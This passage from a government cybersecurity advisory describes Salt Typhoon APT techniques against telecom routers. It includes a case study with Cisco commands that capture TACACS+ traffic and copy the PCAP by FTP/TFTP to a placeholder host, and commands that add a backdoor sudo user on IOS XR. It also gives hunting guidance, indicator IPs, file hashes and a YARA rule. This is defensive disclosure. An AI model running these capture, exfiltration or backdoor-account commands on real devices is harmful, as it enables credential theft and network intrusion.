<li>Following compromise of a router, the following commands and activities have been observed on compromised devices [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/008/" target="_blank" title="T1059.008">T1059.008</a>]:
<ul>
<li>Executing commands via SNMP [<a href="https://attack.mitre.org/versions/v17/techniques/T1569/" target="_blank" title="T1569">T1569</a>].</li>
<li>SSH activity from remote or local IP addresses.</li>
<li>Web interface panel (POST) requests.</li>
<li>When present, using service or automation credentials (e.g., those used by configuration-archival systems such as RANCID) to enumerate and access other networking devices.</li>
<li>Executing Tcl scripts (e.g., <code>TCLproxy.tcl</code> and <code>map.tcl</code>) on Cisco IOS devices where <code>tclsh</code> was available.</li>
</ul>
</li>
<li>Depending on the configuration of the Simple Network Management Protocol (SNMP) on the compromised network device, the APT actors enumerate and alter the configurations for other devices in the same community group, when possible [<a href="https://attack.mitre.org/versions/v17/techniques/T1021/" target="_blank" title="T1021">T1021</a>]. <strong>Note</strong>: Properly configured SNMPv3 is considerably more secure than previous versions.
<ul>
<li>Utilizing SNMPwalk (SNMP GET/WALK) to enumerate devices from APT actor-controlled hosts. Where configuration changes were observed, they were issued as SNMP SET requests to writable objects from those hosts [<a href="https://attack.mitre.org/versions/v17/techniques/T1016/" target="_blank" title="T1016">T1016</a>].</li>
</ul>
</li>
<li>Creating tunnels over protocols, such as Generic Routing Encapsulation (GRE), multipoint GRE (mGRE), or IPsec, on network devices, presumably based on what would be expected in the environment [<a href="https://attack.mitre.org/versions/v17/techniques/T1572/" target="_blank" title="T1572">T1572</a>].
<ul>
<li>These tunnels allow for the encapsulation of multiple network layer protocols over a single tunnel, which can create persistent and covert channels for data transmission to blend in with normal network traffic.</li>
<li>Some of these actions may obscure the APT actors’ source IP address in logs due to being logged as a local IP.</li>
</ul>
</li>
<li>Running commands in an on-box Linux container on supported Cisco networking devices to stage tools, process data locally, and move laterally within the environment. This often allows the APT actors to conduct malicious activities undetected because activities and data within the container are not monitored closely. [<a href="https://attack.mitre.org/versions/v17/techniques/T1610/" target="_blank" title="T1610">T1610</a>] [<a href="https://attack.mitre.org/versions/v17/techniques/T1588/002/" target="_blank" title="T1588.002">T1588.002</a>] [<a href="https://attack.mitre.org/versions/v17/techniques/T1588/005/" target="_blank" title="T1588.005">T1588.005</a>] [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/006/" target="_blank" title="T1059.006">T1059.006</a>].
<ul>
<li>Within Guest Shell, running Python (such as siet.py to exploit Cisco Smart Install) and native Linux tooling, installing packages (e.g., via <code>pip</code>/<code>yum</code> where available), parsing and staging locally collected artifacts (e.g., configurations, packet captures) on device storage [<a href="https://attack.mitre.org/versions/v17/techniques/T1560/" target="_blank" title="T1560">T1560</a>]. On NX-OS devices specifically, using <code>dohost</code> to script host-level CLI actions for reconnaissance and persistence. For Cisco IOS XE, Guest Shell is a Linux container (LXC) managed by IOx that is enabled with <code>guestshell enable</code> and accessed with <code>guestshell run bash</code>. By default, processes inside Guest Shell egress via the management virtual routing and forwarding (VRF) instance. On platforms without a dedicated management port, connectivity can be provided with a <code>VirtualPortGroup</code> interface. Guest Shell can execute Python and other 64-bit Linux applications and can read/write device-accessible storage (e.g., flash) as configured. [<a href="https://attack.mitre.org/versions/v17/techniques/T1609/" target="_blank" title="T1609">T1609</a>] [<a href="https://attack.mitre.org/versions/v17/techniques/T1543/005/" target="_blank" title="T1543.005">T1543.005</a>]</li>
<li>For Cisco NX-OS, Guest Shell is an LXC environment entered with <code>run guestshell</code>. It has direct access to <code>bootflash:</code> and can invoke host NX-OS CLI via the <code>dohost</code> utility. Networking uses the device’s default VRF by default. Operators (or malware) can run commands in other VRFs using <code>chvrf</code>. Systemd-managed services are typically long-running components inside Guest Shell.</li>
<li>Using <code>guestshell disable</code> and <code>guestshell destroy</code> commands to deactivate and uninstall Guest Shell container and return all resources to the system [<a href="https://attack.mitre.org/versions/v17/techniques/T1070/009/" target="_blank" title="T1070.009">T1070.009</a>].</li>
</ul>
</li>
<li>Leveraging open source multi-hop pivoting tools, such as STOWAWAY, to build chained relays for command and control (C2) and operator access, including interactive remote shells, file upload and download, SOCKS5/HTTP proxying, and local/remote port mapping with support for forward and reverse connections over encrypted node-to-node links [<a href="https://attack.mitre.org/versions/v17/techniques/T1090/003/" target="_blank" title="T1090.003">T1090.003</a>].</li>
</ul>
<h3>Lateral movement &amp; collection</h3>
<p>Following initial access, the APT actors target protocols and infrastructure involved in authentication—such as Terminal Access Controller Access Control System Plus (TACACS+)—to facilitate lateral movement across network devices, often through SNMP enumeration and SSH. From these devices, the APT actors passively collect packet capture (PCAP) from specific ISP customer networks [<a href="https://attack.mitre.org/versions/v17/techniques/T1040/" target="_blank" title="T1040">T1040</a>] [<a href="https://attack.mitre.org/versions/v17/techniques/T1005/" target="_blank" title="T1005">T1005</a>]. To further support discovery and lateral movement, the APT actors may target: </p>
<ul>
<li>Authentication Protocols including TACACS+ and Remote Authentication Dial-In User Service (RADIUS)</li>
<li>Managed Information Base (MIB) [<a href="https://attack.mitre.org/versions/v17/techniques/T1602/001/" target="_blank" title="T1602.001">T1602.001</a>]</li>
<li>Router interfaces</li>
<li>Resource Reservation Protocol (RSVP) sessions</li>
<li>Border Gateway Protocol (BGP) routes</li>
<li>Installed software</li>
<li>Configuration files [<a href="https://attack.mitre.org/versions/v17/techniques/T1590/004/" target="_blank" title="T1590.004">T1590.004</a>] [<a href="https://attack.mitre.org/versions/v17/techniques/T1602/002/" target="_blank" title="T1602.002">T1602.002</a>]
<ul>
<li>This is achieved either from existing sources in the network (e.g., output of provider scripts) or through active survey of devices and Trivial File Transfer Protocol (TFTP), to include Multiprotocol Label Switching (MPLS) configuration information.</li>
</ul>
</li>
<li>In-transit network traffic using native capabilities to capture or mirror traffic via the SPAN, RSPAN, or ERSPAN capabilities available on many router models.</li>
<li>Provider-held data, such as:
<ul>
<li>Subscriber information</li>
<li>User content</li>
<li>Customer records and metadata</li>
<li>Network diagrams, inventories, device configurations, and vendor lists</li>
<li>Passwords</li>
</ul>
</li>
</ul>
<p>Capturing network traffic containing credentials via compromised routers is a common method for further enabling lateral movement [<a href="https://attack.mitre.org/versions/v17/techniques/T1040/" target="_blank" title="T1040">T1040</a>]. This typically takes the form of:</p>
<ul>
<li>Leveraging native PCAP functionalities (e.g., Cisco’s Embedded Packet Capture) on routers to collect RADIUS or TACACS+ authentication traffic, which may contain credentials transmitted in cleartext or weakly protected forms.
<ul>
<li>PCAPs have been observed containing naming schemes such as <code>mycap.pcap</code>, <code>tac.pcap</code>, <code>1.pcap</code>, or similar variations.</li>
</ul>
</li>
<li>Modifying a router’s TACACS+ server configuration to point to an APT actor-controlled IP address [<a href="https://attack.mitre.org/versions/v17/techniques/T1556/" target="_blank" title="T1556">T1556</a>]. These actors may use this capability to capture authentication attempts from network administrators or other devices. They may also adjust Authentication, Authorization, and Accounting (AAA) configurations, forcing devices to use less secure authentication methods or send accounting information to their infrastructure.</li>
</ul>
<p>The APT actors collect traffic at Layer 2 or 3 (depending on the protocol used), largely from Cisco IOS devices; however, targeting of other device types is also likely. Based on analysis, the APT actors hold interest in making configuration and routing changes to the devices after compromising the routers. While some actions are specific to Cisco devices, the actors are capable of targeting devices from other vendors and could utilize similar functionality. The APT actors perform several of the modifications or techniques below to facilitate follow-on actions.</p>
<ul>
<li>Creating accounts/users and assigning privileges to those accounts, often via modifying router configurations [<a href="https://attack.mitre.org/versions/v17/techniques/T1136/001/" target="_blank" title="T1136.001">T1136.001</a>].
<ul>
<li>Brute forcing and re-using credentials to access Cisco devices. If a router configuration is collected during initial exploitation and contains a weak hashed Cisco Type 5 (MD5) or 7 (legacy, weak reversible encoding) password [<a href="https://attack.mitre.org/versions/v17/techniques/T1003/" target="_blank" title="T1003">T1003</a>] [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/002/" target="_blank" title="T1110.002">T1110.002</a>]. Weak credentials, such as “cisco” as the username and password, are routinely exploited through these techniques.</li>
</ul>
</li>
<li>Scanning for open ports and services and mirroring (SPAN/RSPAN sessions), allowing traffic monitoring from multiple interfaces [<a href="https://attack.mitre.org/versions/v17/techniques/T1595/" target="_blank" title="T1595">T1595</a>].</li>
<li>Running commands on the router via SNMP, SSH, and HTTP GET or POST requests. These requests typically target privileged execution paths, such as <code>/level/15/exec/-/*</code>, and may include instructions to display configuration files, access BGP routes, manage VRF instances, or clear system logs [<a href="https://attack.mitre.org/versions/v17/techniques/T1082/" target="_blank" title="T1082">T1082</a>].
<ul>
<li>Many compromised devices use well known SNMP community strings, including “public” and “private”.</li>
</ul>
</li>
<li>Configuring PCAP capabilities to collect network traffic.</li>
<li>Configuring tunnels.</li>
<li>Using monitoring tools present in the environment to monitor a device’s (commonly a router’s) configuration changes.</li>
<li>Updating routing tables to route traffic to actor-controlled infrastructure.</li>
<li>Using several techniques to avoid detection of their activity, including:
<ul>
<li>Deleting and/or clearing logs, possibly in tandem with reverting or otherwise modifying stored configuration files to avoid leaving traces of the modifications [<a href="https://attack.mitre.org/versions/v17/techniques/T1070/" target="_blank" title="T1070">T1070</a>].</li>
<li>Disabling logging and/or disabling sending logs to central servers.</li>
<li>Stopping/starting event logging on network devices.</li>
<li>Configuring a Cisco device to run a Guest Shell container to evade detection from collecting artifacts, data, or PCAP [<a href="https://attack.mitre.org/versions/v17/techniques/T1610/" target="_blank" title="T1610">T1610</a>].</li>
</ul>
</li>
</ul>
<h3>Exfiltration</h3>
<p>A key concern with exfiltration is the APT actors’ abuse of peering connections (i.e., a direct interconnection between networks that allows traffic exchange without going through an intermediary) [<a href="https://attack.mitre.org/versions/v17/techniques/T1599/" target="_blank" title="T1599">T1599</a>]. Exfiltration may be facilitated due to a lack of policy restraints or system configurations limiting the types of data received by peered ISPs.</p>
<p>Analysis indicates that the APT actors leverage separate (potentially multiple) command and control channels for exfiltration to conceal their data theft within the noise of high-traffic nodes, such as proxies and Network Address Translation (NAT) pools. The APT actors often use tunnels, such IPsec and GRE, to conduct C2 and exfiltration activities [<a href="https://attack.mitre.org/versions/v17/techniques/T1048/003/" target="_blank" title="T1048.003">T1048.003</a>].</p>
<h2><strong>Case study</strong></h2>
<p>This section details techniques employed by the APT actors, as well as indicators received from analysis to detect this activity. The APT actors were stopped before further actions could be taken on the compromised network.</p>
<h3>Collecting native PCAP</h3>
<p>The APT actors collected PCAPs using native tooling on the compromised system, with the primary objective likely being to capture TACACS+ traffic over TCP port 49. TACACS+ packet bodies can be decrypted if the encryption key is known. In at least one case, the device configuration stored the TACACS+ shared secret using Cisco Type 7 reversible obfuscated encoding. Recovering that secret from the configuration would enable offline decryption of captured TACACS+ payloads. TACACS+ traffic is used for authentication, often for administration of network equipment and including highly privileged network administrators accounts and credentials, likely enabling the actors to compromise additional accounts and perform lateral movement. <br>The commands listed in<strong> Table 1</strong> were observed on a Cisco IOS XE-based host to aid PCAP exfiltration.</p>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><strong>Table 1</strong>: Commands to collect PCAP</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Command    </th>
<th role="columnheader">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>monitor capture mycap interface &lt;interface-name&gt; both</td>
<td>Set up a packet capture named 'mycap'</td>
</tr>
<tr>
<td>monitor capture mycap match ipv4 protocol tcp any any eq 49 </td>
<td rowspan="2">Target port 49 on the above interface - TACACS+</td>
</tr>
<tr>
<td>monitor capture mycap buffer size 100</td>
</tr>
<tr>
<td>monitor capture mycap start</td>
<td>Start the capture</td>
</tr>
<tr>
<td>show monitor capture mycap buffer brief</td>
<td>Check status of capture</td>
</tr>
<tr>
<td>monitor capture mycap export bootflash:tac.pcap</td>
<td>Export PCAP to file, staging for exfiltration</td>
</tr>
<tr>
<td>copy bootflash:tac.pcap ftp://&lt;domain/service&gt;:*@&lt;IP&gt;</td>
<td rowspan="2">Exfiltration</td>
</tr>
<tr>
<td>copy bootflash:tac.pcap tftp://&lt;IP&gt;/tac.pcap</td>
</tr>
</tbody>
</table>
<h4><br><strong>Host-level indicators</strong></h4>
<p>If console logging or visibility of remote FTP/TFTP from a network appliance are available, the following host-level indicators may assist with detecting activity: </p>
<p><code>Capture name: 'mycap' </code><br><code>Capture rule: 'match ipv4 protocol tcp any any eq 49' </code><br><code>Exported pcap filename: 'tac.pcap'</code></p>
<p><code>tftp remote filename: 'tac.pcap' </code><br><code>tftp remote IP: [remote IP]</code> </p>
<h3>Enabling SSH access to the underlying Linux host on IOS XR</h3>
<p>Cisco IOS XR (64-bit) is a Linux-based network operating system built on a Yocto-based Wind River Linux distribution. IOS XR is typically administered via the IOS XR CLI over SSH on port TCP/22 or via console. </p>
<p>The built-in <code>sshd_operns</code> service exposes an additional SSH endpoint on the host Linux. When enabled, it listens on TCP/57722 and provides direct shell access to the host OS. Root logins are not permitted to this service, as only non-root accounts can authenticate.</p>
<p>On IOS XR, <code>sshd_operns</code> is disabled by default and must be explicitly started (e.g., service sshd_operns start). Persistence across reboots requires enabling at <code>init</code> (<code>chkconfig</code>) or equivalent.</p>
<p>In observed intrusions, the APT actors enabled <code>sshd_operns</code>, created a local user, and granted it sudo privileges (e.g., by editing <code>/etc/sudoers</code> or adding a file under <code>/etc/sudoers.d/</code>) to obtain root on the host OS after logging in via TCP/57722. </p>
<p>The commands listed in <strong>Table 2</strong> were executed from the host Linux bash shell as root.</p>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><strong>Table 2</strong>: Commands to add user to sudoers</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Command    </th>
<th role="columnheader">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>service sshd_operns start</td>
<td>Starting the sshd_operns service</td>
</tr>
<tr>
<td>
<p>useradd cisco</p>
<p>password cisco</p>
</td>
<td>Adding a new user</td>
</tr>
<tr>
<td>sudo vi /etc/sudoers</td>
<td>Adding the new user to sudoers</td>
</tr>
<tr>
<td>chmod 4755 /usr/bin/sudo</td>
<td>As 4755 is the default permissions for sudo, it is unclear why the actors executed this command</td>
</tr>
</tbody>
</table>
<h2><strong>Threat hunting guidance</strong></h2>
<p>The authoring agencies encourage network defenders of critical infrastructure organizations, especially telecommunications organizations, to perform threat hunting, and, when appropriate, incident response activities. If malicious activity is suspected or confirmed, organizations should consider all mandatory reporting requirements to relevant agencies and regulators under applicable laws and regulations, and any additional voluntary reporting to appropriate agencies, such as cybersecurity or law enforcement agencies who can provide incident response guidance and assistance with mitigation. See the <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a#Contactinfo" title="Contact Information">Contact information</a> section for additional reporting information.</p>
<p>The malicious activity described in this advisory often involves persistent, long-term access to networks where the APT actors maintain several methods of access. Network defenders should exercise caution when sequencing defensive measures to maximize the chance of achieving full eviction, while remaining compliant with applicable laws, regulations, and guidance on incident response and data breach notifications in their jurisdictions. Where possible, gaining a full understanding of the APT actors’ extent of access into networks followed by simultaneous measures to remove them may be necessary to achieve a complete and lasting eviction. Partial response actions may alert the actors to an ongoing investigation and jeopardize the ability to conduct full eviction. Incident response on one network may also result in the APT actors taking measures to conceal and maintain their access on additional compromised networks, and potentially disrupt broader investigative and operational frameworks already in progress.</p>
<p>The APT actors often take steps to protect their established access, such as compromising mail servers or administrator devices/accounts to monitor for signs that their activity has been detected. Organizations should take steps to protect the details of their threat hunting and incident response from APT actor monitoring activities.</p>
<p>The authoring agencies strongly encourage organizations to conduct the following actions for threat hunting:</p>
<h3>Monitor configurations changes</h3>
<ul>
<li>Pull all configurations for running networking equipment and check for differences with latest authorized versions.
<ul>
<li>Review remote access configurations for proper application of ACL and transport protocols. Review ACLs for any unauthorized modifications.</li>
<li>If SNMP is being used, ensure networking equipment is configured to use SNMPv3 with the appropriate authentication and privacy configurations set, as defined in the User-based Security Model (USM) and the View-based Access Control Model (VACM).</li>
<li>Verify the authenticity of any configured local accounts and their permission levels.</li>
</ul>
</li>
<li>Check all routing tables to ensure that all routes are authorized and expected.</li>
<li>Verify that any PCAP commands configured on networking equipment are authorized.</li>
</ul>
<h3>Monitor virtualized containers</h3>
<ul>
<li>If networking equipment has the capability to run virtualized containers, ensure that all running virtualized containers are expected and authorized.</li>
<li>For devices that support Cisco Guest Shell (IOS XE and NX-OS), do not rely on device syslog alone to detect actor activity. Use a combination of device syslog, AAA command accounting, container (Guest Shell) logs, and off-box flow/telemetry.</li>
<li>Capture lifecycle and CLI activity with AAA accounting (TACACS+/RADIUS) for configuration/exec commands so that enable/disable and entry actions are recorded.</li>
<li>For IOS XE, hunt for <code>guestshell enable</code>, <code>guestshell run bash</code>, and <code>guestshell disable</code>. On NX-OS, hunt for <code>guestshell enable</code>, <code>run guestshel</code>l, and <code>guestshell destroy</code>. Alert on unexpected use of <code>chvrf</code> (running commands under a different VRF) and, on NX-OS, use of <code>dohost</code> (container invoking host CLI).</li>
</ul>
<h3>Monitor network services and tunnels</h3>
<ul>
<li>Monitor for management services running on non-standard ports (SSH, FTP, etc.).</li>
<li>Hunt for actor-favored protocol patterns:
<ul>
<li>SSH on high non-default ports with 22x22/xxx22 numbering patterns from non-admin source IPs.</li>
<li>HTTPS/Web UI listeners on non-default high ports (18xxx) reachable from outside the management VRF.</li>
<li>TCP/57722 (IOS XR <code>sshd_operns</code>) reachability or flows.
<ul>
<li>Hunt for TCP/57722 listeners on IOS XR platforms (the host Linux <code>sshd_operns</code> service). Collect flow/telemetry (NetFlow/IPFIX) from the management VRF. Any inbound TCP/57722 should be treated as high-risk if unexpected.</li>
</ul>
</li>
<li>TACACS+ (TCP/49) flows to non-approved IPs or any TACACS+ traffic leaving the management VRF. Correlate with device configuration to detect redirection of TACACS+ servers to APT actor-controlled infrastructure.</li>
<li>FTP/TFTP flows originating from network devices to unapproved destinations, especially when preceded by on-box PCAP collection activity.</li>
</ul>
</li>
<li>Audit any tunnel that transits a security boundary, such as peering points between providers, to ensure it can be accounted for by network administrators. In particular, examine:
<ul>
<li>Unexplained or unexpected tunnels between Autonomous System Numbers (ASNs).</li>
<li>Unauthorized use of file transfer protocols, such as FTP and TFTP.
<ul>
<li>Monitor network traffic for abnormal volumes of files transfers to internal FTP servers, which the APT actors may use as staging areas prior to data exfiltration.</li>
</ul>
</li>
<li>Extensive SSH activity against routers, followed by the establishment of both an incoming tunnel and outgoing tunnel—each of which may leverage different protocols.</li>
</ul>
</li>
</ul>
<h3>Monitor firmware and software integrity</h3>
<ul>
<li>Perform hash verification on firmware and compare values against the vendor's database to detect unauthorized modification to the firmware. Ensure that the firmware version is as expected.</li>
<li>Compare hashes of images both on disk and in memory against known-good values. Reference the <a href="https://media.defense.gov/2023/Oct/06/2003315573/-1/-1/0/NETWORK%20DEVICE%20INTEGRITY%20NDI%20METHODOLOGY.PDF" target="_blank" title="Network Device Integrity (NDI) Methodology">Network Device Integrity (NDI) Methodology</a> or <a href="https://media.defense.gov/2023/Oct/06/2003315572/-1/-1/0/NETWORK%20DEVICE%20INTEGRITY%20ON%20CISCO%20IOS%20DEVICES.PDF" target="_blank" title="Network Device Integrity (NDI) on Cisco IOS Devices">Network Device Integrity (NDI) on Cisco IOS Devices</a> for more information.</li>
<li>Use the product’s run-time memory validation or integrity verification tool to identify any changes to the run-time firmware image.</li>
<li>Where supported by the platform, enable image and configuration integrity features, such as signed image enforcement and secure configuration checkpoints. Alert on any boot-time or run-time verification failure.</li>
<li>Check any available file directories that may exist (flash, non-volatile random-access memory [NVRAM], system, etc.) for non-standard files.</li>
</ul>
<h3>Monitor logs</h3>
<ul>
<li>Review logs forwarded from network devices for indications of potential malicious behavior, such as:
<ul>
<li>Evidence of clearing locally stored logs,</li>
<li>Disabling log creation or log forwarding,</li>
<li>Starting a PCAP recording process using available functions,</li>
<li>Allowing remote access via non-standard methods or to new locations, and</li>
<li>Changes to configuration of devices via non-standard methods or from unexpected locations.</li>
</ul>
</li>
<li>Alert on creation/start of any on-box packet capture (e.g., <code>monitor capture ... start</code>, Embedded Packet Capture) or SPAN/RSPAN/ERSPAN session definitions, especially those matching TACACS+ (TCP/49) or RADIUS.</li>
<li>Inventory and continuously watch <code>monitor session ...</code> (SPAN/ERSPAN) and PCAP state. Naming patterns include <code>mycap</code> and output filenames like <code>mycap.pcap</code>, <code>tac.pcap</code>, and <code>1.pcap</code>.</li>
<li>Where supported, deploy embedded event triggers (e.g., EEM on IOS XE/NX-OS) to syslog any invocation of packet-capture or <code>span/erspan</code> configuration commands, capturing the invoking username and source.</li>
<li>Audit for non-root local accounts granted sudo on XR host Linux (e.g., via <code>/etc/sudoers</code> or <code>/etc/sudoers.d/</code>). Where supported, ensure the host operating system (OS) <code>sshd_operns</code> service is disabled and not listening. Validate at each reboot and device upgrade.</li>
<li>Alert on config or telemetry indicating new XR host OS services, changes to systemd service states, or unexpected privilege escalations on the host OS.</li>
<li>Analyze internal FTP Server logs for any logins from unexpected sources.</li>
<li>Monitor network traffic for logons from one router to another router, as this should not be typical of normal router administration processes.</li>
</ul>
<p>If unauthorized activities are discovered, coordinate containment sequencing before disabling to avoid tipping active APT operators. Capture live artifacts (process lists, bound sockets, on-box files), then eradicate.</p>
<p>See the <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a#Contactinfo" title="Contact Information">Contact information</a> section of this advisory for response actions that should be taken if malicious activity is confirmed.</p>
<h2><strong>Indicators of compromise</strong></h2>
<h3><strong>IP-based indicators</strong></h3>
<p>The following IP indicators were associated with the APT actors’ activity from August 2021 to June 2025. <strong>Disclaimer</strong>: Several of these observed IP addresses were first observed as early as August 2021 and may no longer be in use by the APT actors. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.</p>
<table>
<caption><strong>Table 3</strong>: APT-associated IP-based Indicators, August 2021-June 2025</caption>
<tbody>
<tr>
<td>1.222.84[.]29 </td>
<td>167.88.173[.]252</td>
<td>23.227.202[.]253</td>
<td>45.61.151[.]12</td>
</tr>
<tr>
<td>103.169.91[.]231</td>
<td>167.88.173[.]58</td>
<td>37.120.239[.]52</td>
<td>45.61.154[.]130</td>
</tr>
<tr>
<td>103.199.17[.]238</td>
<td>167.88.175[.]175</td>
<td>38.71.99[.]145</td>
<td>45.61.159[.]25</td>
</tr>
<tr>
<td>103.253.40[.]199</td>
<td>167.88.175[.]231</td>
<td>43.254.132[.]118</td>
<td>45.61.165[.]157</td>
</tr>
<tr>
<td>103.7.58[.]162</td>
<td>172.86.101[.]123</td>
<td>45.125.64[.]195</td>
<td>5.181.132[.]95</td>
</tr>
<tr>
<td>104.194.129[.]137</td>
<td>172.86.102[.]83</td>
<td>45.125.67[.]144</td>
<td>59.148.233[.]250</td>
</tr>
<tr>
<td>104.194.147[.]15</td>
<td>172.86.106[.]15</td>
<td>45.125.67[.]226</td>
<td>61.19.148[.]66</td>
</tr>
<tr>
<td>104.194.150[.]26</td>
<td>172.86.106[.]234</td>
<td>45.146.120[.]210</td>
<td>63.141.234[.]109</td>
</tr>
<tr>
<td>104.194.153[.]181</td>
<td>172.86.106[.]39</td>
<td>45.146.120[.]213</td>
<td>63.245.1[.]34 </td>
</tr>
<tr>
<td>104.194.154[.]150</td>
<td>172.86.108[.]11</td>
<td>45.59.118[.]136</td>
<td>74.48.78[.]66  </td>
</tr>
<tr>
<td>104.194.154[.]222</td>
<td>172.86.124[.]235</td>
<td>45.59.120[.]171</td>
<td>74.48.78[.]116  </td>
</tr>
<tr>
<td>107.189.15[.]206</td>
<td>172.86.65[.]145</td>
<td>45.61.128[.]29</td>
<td>74.48.84[.]119  </td>
</tr>
<tr>
<td>14.143.247[.]202</td>
<td>172.86.70[.]73</td>
<td>45.61.132[.]125</td>
<td>85.195.89[.]94</td>
</tr>
<tr>
<td>142.171.227[.]16</td>
<td>172.86.80[.]15</td>
<td>45.61.133[.]157</td>
<td>89.117.1[.]147</td>
</tr>
<tr>
<td>144.172.76[.]213</td>
<td>190.131.194[.]90</td>
<td>45.61.133[.]31</td>
<td>89.117.2[.]39</td>
</tr>
<tr>
<td>144.172.79[.]4</td>
<td>193.239.86[.]132</td>
<td>45.61.133[.]61</td>
<td>89.41.26[.]142</td>
</tr>
<tr>
<td>146.70.24[.]144</td>
<td>193.239.86[.]146</td>
<td>45.61.133[.]77</td>
<td>91.231.186[.]227</td>
</tr>
<tr>
<td>146.70.79[.]68</td>
<td>193.43.104[.]185</td>
<td>45.61.133[.]79</td>
<td>91.245.253[.]99</td>
</tr>
<tr>
<td>146.70.79[.]81</td>
<td>193.56.255[.]210</td>
<td>45.61.134[.]134</td>
<td>2001:41d0:700:65dc::f656[:]929f</td>
</tr>
<tr>
<td>167.88.164[.]166</td>
<td>212.236.17[.]237</td>
<td>45.61.134[.]223</td>
<td rowspan="3">2a10:1fc0:7::f19c[:]39b3</td>
</tr>
<tr>
<td>167.88.172[.]70</td>
<td>23.227.196[.]22</td>
<td>45.61.149[.]200</td>
</tr>
<tr>
<td>167.88.173[.]158</td>
<td>23.227.199[.]77</td>
<td>45.61.149[.]62</td>
</tr>
</tbody>
</table>
<h3><br> Custom SFTP client</h3>
<p>The APT actors also use a custom SFTP client, which is a Linux binary written in Golang, to transfer encrypted archives from one location to another. </p>
<p>The following SFTP client binaries in <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a#Table4" title="Table4"><strong>Table 4</strong></a> through <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a#Table7" title="Table 7"><strong>Table 7</strong></a><strong> </strong>are similar in that they are used to transfer files from a compromised network to staging hosts where the files are prepared for exfiltration. However, <code>cmd1</code> has the additional capability of collecting network packet captures on the compromised network. Note: The <code>cmd3</code> and <code>cmd1</code> clients were likely written by the same developer since they have similar build path strings and code structure.</p>
<table>
<caption><a class="ck-anchor"><strong>Table 4</strong></a>: cmd3 SFTP client </caption>
<tbody>
<tr>
<th>File Name </th>
<td>cmd3 </td>
</tr>
<tr>
<th>MD5 Hash </th>
<td>eba9ae70d1b22de67b0eba160a6762d8 </td>
</tr>
<tr>
<th>SHA 256 Hash</th>
<td>8b448f47e36909f3a921b4ff803cf3a61985d8a10f0fe594b405b92ed0fc21f1</td>
</tr>
<tr>
<th>File Size (bytes) </th>
<td>3506176 </td>
</tr>
<tr>
<th>File Type </th>
<td>ELF 64-bit LSB executable x86-64 version 1 (SYSV) statically linked Go BuildID=rHFK_GWSIG3fShYR02ys/Hou3WF-dO9MYtI232CYr/<br>D3n2Irn5doNndtloYkEi/r3IcebaH3y02cYer7tm0 stripped </td>
</tr>
<tr>
<th>Command Line Usage </th>
<td>./cmd3 &lt;encrypted_configuration_string&gt; </td>
</tr>
<tr>
<th>Version String </th>
<td>v1.0 </td>
</tr>
<tr>
<th>Build Path String </th>
<td>C:/work/sync/cmd/cmd3/main.go </td>
</tr>
</tbody>
</table>
<table>
<caption><strong>Table 5</strong>: cmd1 SFTP client</caption>
<tbody>
<tr>
<th>File Name </th>
<td>cmd1 </td>
</tr>
<tr>
<th>MD5 Hash </th>
<td>33e692f435d6cf3c637ba54836c63373 </td>
</tr>
<tr>
<th>SHA 256 Hash</th>
<td>f2bbba1ea0f34b262f158ff31e00d39d89bbc471d04e8fca60a034cabe18e4f4</td>
</tr>
<tr>
<th>File Size (bytes) </th>
<td>3358720 </td>
</tr>
<tr>
<th>File Type </th>
<td>ELF 64-bit LSB executable x86-64 version 1 (SYSV) statically linked Go BuildID=N3lepXdViXHdPCh5amSa/LhM5susdTarcmIQEMqku/<br>eplvxiWNUFNeKXjT-6sd/R-eCtbFZFNozRZqEuwZY stripped </td>
</tr>
<tr>
<th>Command Line Usage </th>
<td>./cmd1 &lt;encrypted_configuration_string&gt; </td>
</tr>
<tr>
<th>Version String </th>
<td>V20240816 </td>
</tr>
<tr>
<th>Build Path String </th>
<td>C:/work/sync_v1/cmd/cmd1/main.go </td>
</tr>
</tbody>
</table>
<h4><strong>Cmd1 SFTP client Yara rule </strong></h4>
<div>
<div>
<p><code>rule SALT_TYPHOON_CMD1_SFTP_CLIENT {</code></p>
<p><code>    meta:</code></p>
<p><code>    description = "Detects the Salt Typhoon Cmd1 SFTP client. Rule is meant for threat hunting."</code></p>
<p> </p>
<p><code>    strings:</code></p>
<p><code>        $s1 = "monitor capture CAP"</code></p>
<p><code>        $s2 = "export ftp://%s:%s@%s%s"</code></p>
<p><code>        $s3 = "main.CapExport"</code></p>
<p><code>        $s4 = "main.SftpDownload"</code></p>
<p><code>        $s5 = ".(*SSHClient).CommandShell"</code></p>
<p><code>        $aes = "aes.decryptBlockGo"</code></p>
<p><code>        $buildpath = "C:/work/sync_v1/cmd/cmd1/main.go"</code></p>
<p> </p>
<p><code>    condition:</code></p>
<p><code>        (uint32(0) == 0x464c457f or (uint16(0) == 0x5A4D and </code><br><code>        uint32(uint32(0x3C)) == 0x00004550) or ((uint32(0) == 0xcafebabe)</code><br><code>        or (uint32(0) == 0xfeedface) or (uint32(0) == 0xfeedfacf) </code><br><code>        or (uint32(0) == 0xbebafeca) or (uint32(0) == 0xcefaedfe) </code><br><code>        or (uint32(0) == 0xcffaedfe))) </code><br><code>        and 5 of them</code></p>
<p><code>}</code></p>
<table>
<caption><strong>Table 6</strong>: new2 SFTP client</caption>
<tbody>
<tr>
<th>File Name </th>
<td>new2</td>
</tr>
<tr>
<th>SHA 256 Hash</th>
<td>da692ea0b7f24e31696f8b4fe8a130dbbe3c7c15cea6bde24cccc1fb0a73ae9e</td>
</tr>
<tr>
<th>File Type </th>
<td>ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=294d1f19a085a730da19a6c55788ec08c2187039, stripped</td>
</tr>
</tbody>
</table>
